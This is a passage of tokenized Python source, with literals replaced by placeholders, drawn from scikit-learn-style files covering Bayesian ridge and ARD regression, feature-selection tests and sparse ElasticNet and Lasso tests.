'<STR_LIT>' <EOL> % ( _signature_str ( name , arg_spec ) , <EOL> _function_called_str ( name , args , kwargs ) ) <EOL> ) <EOL> varkwargs = dict ( ) <EOL> for arg_name , arg_value in sorted ( kwargs . items ( ) ) : <EOL> if arg_name in arg_dict : <EOL> arg_dict [ arg_name ] = arg_value <EOL> elif arg_varkw is not None : <EOL> varkwargs [ arg_name ] = arg_value <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , arg_name ) ) <EOL> if arg_varkw is not None : <EOL> arg_dict [ '<STR_LIT>' ] = varkwargs <EOL> if arg_varargs is not None : <EOL> varargs = args [ arg_position + <NUM_LIT:1> : ] <EOL> arg_dict [ '<STR_LIT:*>' ] = varargs <EOL> for item in ignore_lst : <EOL> if item in arg_dict : <EOL> arg_dict . pop ( item ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( item , <EOL> _signature_str ( name , arg_spec ) ) <EOL> ) <EOL> return arg_dict <EOL> def format_signature ( func , * args , ** kwargs ) : <EOL> module , name = get_func_name ( func ) <EOL> module = [ m for m in module if m ] <EOL> if module : <EOL> module . 
append ( name ) <EOL> module_path = '<STR_LIT:.>' . join ( module ) <EOL> else : <EOL> module_path = name <EOL> arg_str = list ( ) <EOL> previous_length = <NUM_LIT:0> <EOL> for arg in args : <EOL> arg = pformat ( arg , indent = <NUM_LIT:2> ) <EOL> if len ( arg ) > <NUM_LIT> : <EOL> arg = '<STR_LIT>' % arg [ : <NUM_LIT> ] <EOL> if previous_length > <NUM_LIT> : <EOL> arg = '<STR_LIT>' % arg <EOL> previous_length = len ( arg ) <EOL> arg_str . append ( arg ) <EOL> arg_str . extend ( [ '<STR_LIT>' % ( v , pformat ( i ) ) for v , i in kwargs . items ( ) ] ) <EOL> arg_str = '<STR_LIT:U+002CU+0020>' . join ( arg_str ) <EOL> signature = '<STR_LIT>' % ( name , arg_str ) <EOL> return module_path , signature <EOL> def format_call ( func , args , kwargs , object_name = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> path , signature = format_signature ( func , * args , ** kwargs ) <EOL> msg = '<STR_LIT>' % ( <NUM_LIT> * '<STR_LIT:_>' , object_name , <EOL> path , signature ) <EOL> return msg </s>
<s> import numpy as np <EOL> from scipy import sparse as sp <EOL> from nose . tools import assert_raises , assert_equal <EOL> from numpy . testing import assert_array_equal <EOL> from sklearn . base import BaseEstimator <EOL> from sklearn . feature_selection . base import SelectorMixin <EOL> from sklearn . utils import check_array <EOL> class StepSelector ( SelectorMixin , BaseEstimator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , step = <NUM_LIT:2> ) : <EOL> self . step = step <EOL> def fit ( self , X , y = None ) : <EOL> X = check_array ( X , '<STR_LIT>' ) <EOL> self . n_input_feats = X . shape [ <NUM_LIT:1> ] <EOL> return self <EOL> def _get_support_mask ( self ) : <EOL> mask = np . zeros ( self . n_input_feats , dtype = bool ) <EOL> mask [ : : self . step ] = True <EOL> return mask <EOL> support = [ True , False ] * <NUM_LIT:5> <EOL> support_inds = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> , <NUM_LIT:8> ] <EOL> X = np . arange ( <NUM_LIT:20> ) . reshape ( <NUM_LIT:2> , <NUM_LIT:10> ) <EOL> Xt = np . arange ( <NUM_LIT:0> , <NUM_LIT:20> , <NUM_LIT:2> ) . reshape ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> Xinv = X . copy ( ) <EOL> Xinv [ : , <NUM_LIT:1> : : <NUM_LIT:2> ] = <NUM_LIT:0> <EOL> y = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> feature_names = list ( '<STR_LIT>' ) <EOL> feature_names_t = feature_names [ : : <NUM_LIT:2> ] <EOL> feature_names_inv = np . array ( feature_names ) <EOL> feature_names_inv [ <NUM_LIT:1> : : <NUM_LIT:2> ] = '<STR_LIT>' <EOL> def test_transform_dense ( ) : <EOL> sel = StepSelector ( ) <EOL> Xt_actual = sel . fit ( X , y ) . transform ( X ) <EOL> Xt_actual2 = StepSelector ( ) . fit_transform ( X , y ) <EOL> assert_array_equal ( Xt , Xt_actual ) <EOL> assert_array_equal ( Xt , Xt_actual2 ) <EOL> assert_equal ( np . int32 , sel . transform ( X . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , sel . transform ( X . astype ( np . float32 ) ) . dtype ) <EOL> names_t_actual = sel . 
transform ( [ feature_names ] ) <EOL> assert_array_equal ( feature_names_t , names_t_actual . ravel ( ) ) <EOL> assert_raises ( ValueError , sel . transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_transform_sparse ( ) : <EOL> sparse = sp . csc_matrix <EOL> sel = StepSelector ( ) <EOL> Xt_actual = sel . fit ( sparse ( X ) ) . transform ( sparse ( X ) ) <EOL> Xt_actual2 = sel . fit_transform ( sparse ( X ) ) <EOL> assert_array_equal ( Xt , Xt_actual . toarray ( ) ) <EOL> assert_array_equal ( Xt , Xt_actual2 . toarray ( ) ) <EOL> assert_equal ( np . int32 , sel . transform ( sparse ( X ) . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , sel . transform ( sparse ( X ) . astype ( np . float32 ) ) . dtype ) <EOL> assert_raises ( ValueError , sel . transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_inverse_transform_dense ( ) : <EOL> sel = StepSelector ( ) <EOL> Xinv_actual = sel . fit ( X , y ) . inverse_transform ( Xt ) <EOL> assert_array_equal ( Xinv , Xinv_actual ) <EOL> assert_equal ( np . int32 , <EOL> sel . inverse_transform ( Xt . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , <EOL> sel . inverse_transform ( Xt . astype ( np . float32 ) ) . dtype ) <EOL> names_inv_actual = sel . inverse_transform ( [ feature_names_t ] ) <EOL> assert_array_equal ( feature_names_inv , names_inv_actual . ravel ( ) ) <EOL> assert_raises ( ValueError , sel . inverse_transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_inverse_transform_sparse ( ) : <EOL> sparse = sp . csc_matrix <EOL> sel = StepSelector ( ) <EOL> Xinv_actual = sel . fit ( sparse ( X ) ) . inverse_transform ( sparse ( Xt ) ) <EOL> assert_array_equal ( Xinv , Xinv_actual . toarray ( ) ) <EOL> assert_equal ( np . int32 , <EOL> sel . inverse_transform ( sparse ( Xt ) . astype ( np . int32 ) ) . dtype ) <EOL> assert_equal ( np . float32 , <EOL> sel . inverse_transform ( sparse ( Xt ) . 
astype ( np . float32 ) ) . dtype ) <EOL> assert_raises ( ValueError , sel . inverse_transform , np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] ] ) ) <EOL> def test_get_support ( ) : <EOL> sel = StepSelector ( ) <EOL> sel . fit ( X , y ) <EOL> assert_array_equal ( support , sel . get_support ( ) ) <EOL> assert_array_equal ( support_inds , sel . get_support ( indices = True ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from math import log <EOL> import numpy as np <EOL> from scipy import linalg <EOL> from . base import LinearModel <EOL> from . . base import RegressorMixin <EOL> from . . utils . extmath import fast_logdet , pinvh <EOL> from . . utils import check_X_y <EOL> class BayesianRidge ( LinearModel , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_iter = <NUM_LIT> , tol = <NUM_LIT> , alpha_1 = <NUM_LIT> , alpha_2 = <NUM_LIT> , <EOL> lambda_1 = <NUM_LIT> , lambda_2 = <NUM_LIT> , compute_score = False , <EOL> fit_intercept = True , normalize = False , copy_X = True , <EOL> verbose = False ) : <EOL> self . n_iter = n_iter <EOL> self . tol = tol <EOL> self . alpha_1 = alpha_1 <EOL> self . alpha_2 = alpha_2 <EOL> self . lambda_1 = lambda_1 <EOL> self . lambda_2 = lambda_2 <EOL> self . compute_score = compute_score <EOL> self . fit_intercept = fit_intercept <EOL> self . normalize = normalize <EOL> self . copy_X = copy_X <EOL> self . verbose = verbose <EOL> def fit ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> X , y = check_X_y ( X , y , dtype = np . float64 , y_numeric = True ) <EOL> X , y , X_offset , y_offset , X_scale = self . _preprocess_data ( <EOL> X , y , self . fit_intercept , self . normalize , self . copy_X ) <EOL> n_samples , n_features = X . shape <EOL> alpha_ = <NUM_LIT:1.> / np . var ( y ) <EOL> lambda_ = <NUM_LIT:1.> <EOL> verbose = self . verbose <EOL> lambda_1 = self . lambda_1 <EOL> lambda_2 = self . lambda_2 <EOL> alpha_1 = self . alpha_1 <EOL> alpha_2 = self . alpha_2 <EOL> self . scores_ = list ( ) <EOL> coef_old_ = None <EOL> XT_y = np . dot ( X . T , y ) <EOL> U , S , Vh = linalg . svd ( X , full_matrices = False ) <EOL> eigen_vals_ = S ** <NUM_LIT:2> <EOL> for iter_ in range ( self . n_iter ) : <EOL> if n_samples > n_features : <EOL> coef_ = np . dot ( Vh . T , <EOL> Vh / ( eigen_vals_ + lambda_ / alpha_ ) [ : , None ] ) <EOL> coef_ = np . 
dot ( coef_ , XT_y ) <EOL> if self . compute_score : <EOL> logdet_sigma_ = - np . sum ( <EOL> np . log ( lambda_ + alpha_ * eigen_vals_ ) ) <EOL> else : <EOL> coef_ = np . dot ( X . T , np . dot ( <EOL> U / ( eigen_vals_ + lambda_ / alpha_ ) [ None , : ] , U . T ) ) <EOL> coef_ = np . dot ( coef_ , y ) <EOL> if self . compute_score : <EOL> logdet_sigma_ = lambda_ * np . ones ( n_features ) <EOL> logdet_sigma_ [ : n_samples ] += alpha_ * eigen_vals_ <EOL> logdet_sigma_ = - np . sum ( np . log ( logdet_sigma_ ) ) <EOL> rmse_ = np . sum ( ( y - np . dot ( X , coef_ ) ) ** <NUM_LIT:2> ) <EOL> gamma_ = ( np . sum ( ( alpha_ * eigen_vals_ ) / <EOL> ( lambda_ + alpha_ * eigen_vals_ ) ) ) <EOL> lambda_ = ( ( gamma_ + <NUM_LIT:2> * lambda_1 ) / <EOL> ( np . sum ( coef_ ** <NUM_LIT:2> ) + <NUM_LIT:2> * lambda_2 ) ) <EOL> alpha_ = ( ( n_samples - gamma_ + <NUM_LIT:2> * alpha_1 ) / <EOL> ( rmse_ + <NUM_LIT:2> * alpha_2 ) ) <EOL> if self . compute_score : <EOL> s = lambda_1 * log ( lambda_ ) - lambda_2 * lambda_ <EOL> s += alpha_1 * log ( alpha_ ) - alpha_2 * alpha_ <EOL> s += <NUM_LIT:0.5> * ( n_features * log ( lambda_ ) + <EOL> n_samples * log ( alpha_ ) - <EOL> alpha_ * rmse_ - <EOL> ( lambda_ * np . sum ( coef_ ** <NUM_LIT:2> ) ) - <EOL> logdet_sigma_ - <EOL> n_samples * log ( <NUM_LIT:2> * np . pi ) ) <EOL> self . scores_ . append ( s ) <EOL> if iter_ != <NUM_LIT:0> and np . sum ( np . abs ( coef_old_ - coef_ ) ) < self . tol : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , str ( iter_ ) , "<STR_LIT>" ) <EOL> break <EOL> coef_old_ = np . copy ( coef_ ) <EOL> self . alpha_ = alpha_ <EOL> self . lambda_ = lambda_ <EOL> self . coef_ = coef_ <EOL> self . 
_set_intercept ( X_offset , y_offset , X_scale ) <EOL> return self <EOL> class ARDRegression ( LinearModel , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_iter = <NUM_LIT> , tol = <NUM_LIT> , alpha_1 = <NUM_LIT> , alpha_2 = <NUM_LIT> , <EOL> lambda_1 = <NUM_LIT> , lambda_2 = <NUM_LIT> , compute_score = False , <EOL> threshold_lambda = <NUM_LIT> , fit_intercept = True , normalize = False , <EOL> copy_X = True , verbose = False ) : <EOL> self . n_iter = n_iter <EOL> self . tol = tol <EOL> self . fit_intercept = fit_intercept <EOL> self . normalize = normalize <EOL> self . alpha_1 = alpha_1 <EOL> self . alpha_2 = alpha_2 <EOL> self . lambda_1 = lambda_1 <EOL> self . lambda_2 = lambda_2 <EOL> self . compute_score = compute_score <EOL> self . threshold_lambda = threshold_lambda <EOL> self . copy_X = copy_X <EOL> self . verbose = verbose <EOL> def fit ( self , X , y ) : <EOL> """<STR_LIT>""" <EOL> X , y = check_X_y ( X , y , dtype = np . float64 , y_numeric = True ) <EOL> n_samples , n_features = X . shape <EOL> coef_ = np . zeros ( n_features ) <EOL> X , y , X_offset , y_offset , X_scale = self . _preprocess_data ( <EOL> X , y , self . fit_intercept , self . normalize , self . copy_X ) <EOL> keep_lambda = np . ones ( n_features , dtype = bool ) <EOL> lambda_1 = self . lambda_1 <EOL> lambda_2 = self . lambda_2 <EOL> alpha_1 = self . alpha_1 <EOL> alpha_2 = self . alpha_2 <EOL> verbose = self . verbose <EOL> alpha_ = <NUM_LIT:1.> / np . var ( y ) <EOL> lambda_ = np . ones ( n_features ) <EOL> self . scores_ = list ( ) <EOL> coef_old_ = None <EOL> for iter_ in range ( self . n_iter ) : <EOL> sigma_ = pinvh ( np . eye ( n_samples ) / alpha_ + <EOL> np . dot ( X [ : , keep_lambda ] * <EOL> np . reshape ( <NUM_LIT:1.> / lambda_ [ keep_lambda ] , [ <NUM_LIT:1> , - <NUM_LIT:1> ] ) , <EOL> X [ : , keep_lambda ] . T ) ) <EOL> sigma_ = np . dot ( sigma_ , X [ : , keep_lambda ] * <EOL> np . 
reshape ( <NUM_LIT:1.> / lambda_ [ keep_lambda ] , [ <NUM_LIT:1> , - <NUM_LIT:1> ] ) ) <EOL> sigma_ = - np . dot ( np . reshape ( <NUM_LIT:1.> / lambda_ [ keep_lambda ] , [ - <NUM_LIT:1> , <NUM_LIT:1> ] ) * <EOL> X [ : , keep_lambda ] . T , sigma_ ) <EOL> sigma_ . flat [ : : ( sigma_ . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> ) ] += <NUM_LIT:1.> / lambda_ [ keep_lambda ] <EOL> coef_ [ keep_lambda ] = alpha_ * np . dot ( <EOL> sigma_ , np . dot ( X [ : , keep_lambda ] . T , y ) ) <EOL> rmse_ = np . sum ( ( y - np . dot ( X , coef_ ) ) ** <NUM_LIT:2> ) <EOL> gamma_ = <NUM_LIT:1.> - lambda_ [ keep_lambda ] * np . diag ( sigma_ ) <EOL> lambda_ [ keep_lambda ] = ( ( gamma_ + <NUM_LIT> * lambda_1 ) / <EOL> ( ( coef_ [ keep_lambda ] ) ** <NUM_LIT:2> + <EOL> <NUM_LIT> * lambda_2 ) ) <EOL> alpha_ = ( ( n_samples - gamma_ . sum ( ) + <NUM_LIT> * alpha_1 ) / <EOL> ( rmse_ + <NUM_LIT> * alpha_2 ) ) <EOL> keep_lambda = lambda_ < self . threshold_lambda <EOL> coef_ [ ~ keep_lambda ] = <NUM_LIT:0> <EOL> if self . compute_score : <EOL> s = ( lambda_1 * np . log ( lambda_ ) - lambda_2 * lambda_ ) . sum ( ) <EOL> s += alpha_1 * log ( alpha_ ) - alpha_2 * alpha_ <EOL> s += <NUM_LIT:0.5> * ( fast_logdet ( sigma_ ) + n_samples * log ( alpha_ ) + <EOL> np . sum ( np . log ( lambda_ ) ) ) <EOL> s -= <NUM_LIT:0.5> * ( alpha_ * rmse_ + ( lambda_ * coef_ ** <NUM_LIT:2> ) . sum ( ) ) <EOL> self . scores_ . append ( s ) <EOL> if iter_ > <NUM_LIT:0> and np . sum ( np . abs ( coef_old_ - coef_ ) ) < self . tol : <EOL> if verbose : <EOL> print ( "<STR_LIT>" % iter_ ) <EOL> break <EOL> coef_old_ = np . copy ( coef_ ) <EOL> self . coef_ = coef_ <EOL> self . alpha_ = alpha_ <EOL> self . sigma_ = sigma_ <EOL> self . lambda_ = lambda_ <EOL> self . _set_intercept ( X_offset , y_offset , X_scale ) <EOL> return self </s>
<s> import numpy as np <EOL> import scipy . sparse as sp <EOL> from sklearn . utils . testing import assert_array_almost_equal <EOL> from sklearn . utils . testing import assert_almost_equal <EOL> from sklearn . utils . testing import assert_equal <EOL> from sklearn . utils . testing import assert_less <EOL> from sklearn . utils . testing import assert_true <EOL> from sklearn . utils . testing import assert_greater <EOL> from sklearn . utils . testing import ignore_warnings <EOL> from sklearn . linear_model . coordinate_descent import ( Lasso , ElasticNet , <EOL> LassoCV , ElasticNetCV ) <EOL> def test_sparse_coef ( ) : <EOL> clf = ElasticNet ( ) <EOL> clf . coef_ = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> assert_true ( sp . isspmatrix ( clf . sparse_coef_ ) ) <EOL> assert_equal ( clf . sparse_coef_ . toarray ( ) . tolist ( ) [ <NUM_LIT:0> ] , clf . coef_ ) <EOL> def test_normalize_option ( ) : <EOL> X = sp . csc_matrix ( [ [ - <NUM_LIT:1> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) <EOL> y = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> clf_dense = ElasticNet ( fit_intercept = True , normalize = True ) <EOL> clf_sparse = ElasticNet ( fit_intercept = True , normalize = True ) <EOL> clf_dense . fit ( X , y ) <EOL> X = sp . csc_matrix ( X ) <EOL> clf_sparse . fit ( X , y ) <EOL> assert_almost_equal ( clf_dense . dual_gap_ , <NUM_LIT:0> ) <EOL> assert_array_almost_equal ( clf_dense . coef_ , clf_sparse . coef_ ) <EOL> def test_lasso_zero ( ) : <EOL> X = sp . csc_matrix ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> y = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> T = np . array ( [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> clf = Lasso ( ) . fit ( X , y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT:0> ] ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( clf . 
dual_gap_ , <NUM_LIT:0> ) <EOL> def test_enet_toy_list_input ( ) : <EOL> X = np . array ( [ [ - <NUM_LIT:1> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) <EOL> X = sp . csc_matrix ( X ) <EOL> Y = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> T = np . array ( [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:4> ] ] ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0> , l1_ratio = <NUM_LIT:1.0> ) <EOL> ignore_warnings ( clf . fit ) ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT> , max_iter = <NUM_LIT:1000> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT:0.5> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> def test_enet_toy_explicit_sparse_input ( ) : <EOL> f = ignore_warnings <EOL> X = sp . lil_matrix ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> X [ <NUM_LIT:0> , <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> X [ <NUM_LIT:2> , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> Y = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> T = sp . 
lil_matrix ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> T [ <NUM_LIT:0> , <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> T [ <NUM_LIT:1> , <NUM_LIT:0> ] = <NUM_LIT:3> <EOL> T [ <NUM_LIT:2> , <NUM_LIT:0> ] = <NUM_LIT:4> <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0> , l1_ratio = <NUM_LIT:1.0> ) <EOL> f ( clf . fit ) ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT> , max_iter = <NUM_LIT:1000> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , decimal = <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> clf = ElasticNet ( alpha = <NUM_LIT:0.5> , l1_ratio = <NUM_LIT:0.5> ) <EOL> clf . fit ( X , Y ) <EOL> pred = clf . predict ( T ) <EOL> assert_array_almost_equal ( clf . coef_ , [ <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_array_almost_equal ( pred , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <NUM_LIT:3> ) <EOL> assert_almost_equal ( clf . dual_gap_ , <NUM_LIT:0> ) <EOL> def make_sparse_data ( n_samples = <NUM_LIT:100> , n_features = <NUM_LIT:100> , n_informative = <NUM_LIT:10> , seed = <NUM_LIT> , <EOL> positive = False , n_targets = <NUM_LIT:1> ) : <EOL> random_state = np . random . RandomState ( seed ) <EOL> w = random_state . randn ( n_features , n_targets ) <EOL> w [ n_informative : ] = <NUM_LIT:0.0> <EOL> if positive : <EOL> w = np . abs ( w ) <EOL> X = random_state . randn ( n_samples , n_features ) <EOL> rnd = random_state . uniform ( size = ( n_samples , n_features ) ) <EOL> X [ rnd > <NUM_LIT:0.5> ] = <NUM_LIT:0.0> <EOL> y = np . dot ( X , w ) <EOL> X = sp . 
csc_matrix ( X ) <EOL> if n_targets == <NUM_LIT:1> : <EOL> y = np . ravel ( y ) <EOL> return X , y <EOL> def _test_sparse_enet_not_as_toy_dataset ( alpha , fit_intercept , positive ) : <EOL> n_samples , n_features , max_iter = <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:1000> <EOL> n_informative = <NUM_LIT:10> <EOL> X , y = make_sparse_data ( n_samples , n_features , n_informative , <EOL> positive = positive ) <EOL> X_train , X_test = X [ n_samples // <NUM_LIT:2> : ] , X [ : n_samples // <NUM_LIT:2> ] <EOL> y_train , y_test = y [ n_samples // <NUM_LIT:2> : ] , y [ : n_samples // <NUM_LIT:2> ] <EOL> s_clf = ElasticNet ( alpha = alpha , l1_ratio = <NUM_LIT> , fit_intercept = fit_intercept , <EOL> max_iter = max_iter , tol = <NUM_LIT> , positive = positive , <EOL> warm_start = True ) <EOL> s_clf . fit ( X_train , y_train ) <EOL> assert_almost_equal ( s_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( s_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> d_clf = ElasticNet ( alpha = alpha , l1_ratio = <NUM_LIT> , fit_intercept = fit_intercept , <EOL> max_iter = max_iter , tol = <NUM_LIT> , positive = positive , <EOL> warm_start = True ) <EOL> d_clf . fit ( X_train . toarray ( ) , y_train ) <EOL> assert_almost_equal ( d_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( d_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> assert_almost_equal ( s_clf . coef_ , d_clf . coef_ , <NUM_LIT:5> ) <EOL> assert_almost_equal ( s_clf . intercept_ , d_clf . intercept_ , <NUM_LIT:5> ) <EOL> assert_less ( np . sum ( s_clf . 
coef_ != <NUM_LIT:0.0> ) , <NUM_LIT:2> * n_informative ) <EOL> def test_sparse_enet_not_as_toy_dataset ( ) : <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT:0.1> , fit_intercept = False , <EOL> positive = False ) <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT:0.1> , fit_intercept = True , <EOL> positive = False ) <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT> , fit_intercept = False , <EOL> positive = True ) <EOL> _test_sparse_enet_not_as_toy_dataset ( alpha = <NUM_LIT> , fit_intercept = True , <EOL> positive = True ) <EOL> def test_sparse_lasso_not_as_toy_dataset ( ) : <EOL> n_samples = <NUM_LIT:100> <EOL> max_iter = <NUM_LIT:1000> <EOL> n_informative = <NUM_LIT:10> <EOL> X , y = make_sparse_data ( n_samples = n_samples , n_informative = n_informative ) <EOL> X_train , X_test = X [ n_samples // <NUM_LIT:2> : ] , X [ : n_samples // <NUM_LIT:2> ] <EOL> y_train , y_test = y [ n_samples // <NUM_LIT:2> : ] , y [ : n_samples // <NUM_LIT:2> ] <EOL> s_clf = Lasso ( alpha = <NUM_LIT:0.1> , fit_intercept = False , max_iter = max_iter , tol = <NUM_LIT> ) <EOL> s_clf . fit ( X_train , y_train ) <EOL> assert_almost_equal ( s_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( s_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> d_clf = Lasso ( alpha = <NUM_LIT:0.1> , fit_intercept = False , max_iter = max_iter , tol = <NUM_LIT> ) <EOL> d_clf . fit ( X_train . toarray ( ) , y_train ) <EOL> assert_almost_equal ( d_clf . dual_gap_ , <NUM_LIT:0> , <NUM_LIT:4> ) <EOL> assert_greater ( d_clf . score ( X_test , y_test ) , <NUM_LIT> ) <EOL> assert_equal ( np . sum ( s_clf . coef_ != <NUM_LIT:0.0> ) , n_informative ) <EOL> def test_enet_multitarget ( ) : <EOL> n_targets = <NUM_LIT:3> <EOL> X , y = make_sparse_data ( n_targets = n_targets ) <EOL> estimator = ElasticNet ( alpha = <NUM_LIT> , fit_intercept = True , precompute = None ) <EOL> estimator . fit ( X , y ) <EOL> coef , intercept , dual_gap = ( estimator . 
coef_ , <EOL> estimator . intercept_ , <EOL> estimator . dual_gap_ ) <EOL> for k in range ( n_targets ) : <EOL> estimator . fit ( X , y [ : , k ] ) <EOL> assert_array_almost_equal ( coef [ k , : ] , estimator . coef_ ) <EOL> assert_array_almost_equal ( intercept [ k ] , estimator . intercept_ ) <EOL> assert_array_almost_equal ( dual_gap [ k ] , estimator . dual_gap_ ) <EOL> def test_path_parameters ( ) : <EOL> X , y = make_sparse_data ( ) <EOL> max_iter = <NUM_LIT:50> <EOL> n_alphas = <NUM_LIT:10> <EOL> clf = ElasticNetCV ( n_alphas = n_alphas , eps = <NUM_LIT> , max_iter = max_iter , <EOL> l1_ratio = <NUM_LIT:0.5> , fit_intercept = False ) <EOL> ignore_warnings ( clf . fit ) ( X , y ) <EOL> assert_almost_equal ( <NUM_LIT:0.5> , clf . l1_ratio ) <EOL> assert_equal ( n_alphas , clf . n_alphas ) <EOL> assert_equal ( n_alphas , len ( clf . alphas_ ) ) <EOL> sparse_mse_path = clf . mse_path_ <EOL> ignore_warnings ( clf . fit ) ( X . toarray ( ) , y ) <EOL> assert_almost_equal ( clf . mse_path_ , sparse_mse_path ) <EOL> def test_same_output_sparse_dense_lasso_and_enet_cv ( ) : <EOL> X , y = make_sparse_data ( n_samples = <NUM_LIT> , n_features = <NUM_LIT:10> ) <EOL> for normalize in [ True , False ] : <EOL> clfs = ElasticNetCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:5> , normalize = normalize ) <EOL> ignore_warnings ( clfs . fit ) ( X , y ) <EOL> clfd = ElasticNetCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:5> , normalize = normalize ) <EOL> ignore_warnings ( clfd . fit ) ( X . toarray ( ) , y ) <EOL> assert_almost_equal ( clfs . alpha_ , clfd . alpha_ , <NUM_LIT:7> ) <EOL> assert_almost_equal ( clfs . intercept_ , clfd . intercept_ , <NUM_LIT:7> ) <EOL> assert_array_almost_equal ( clfs . mse_path_ , clfd . mse_path_ ) <EOL> assert_array_almost_equal ( clfs . alphas_ , clfd . alphas_ ) <EOL> clfs = LassoCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:4> , normalize = normalize ) <EOL> ignore_warnings ( clfs . 
